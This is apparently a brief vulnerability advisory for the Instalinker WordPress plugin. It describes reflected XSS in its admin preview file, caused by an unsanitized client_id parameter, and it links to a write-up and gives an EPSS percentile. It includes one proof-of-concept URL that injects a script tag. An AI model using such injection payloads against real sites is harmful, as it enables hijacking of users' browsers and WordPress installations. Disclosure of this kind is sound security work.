EPSS
Percentile
32.7%
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user’s browser and potentially compromise the WordPress installation.
http://www.example.com/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php?client_id="><script>alert(1);</script><div data-il-client-id="
rastating.github.io/instalinker-reflected-xss-information-disclosure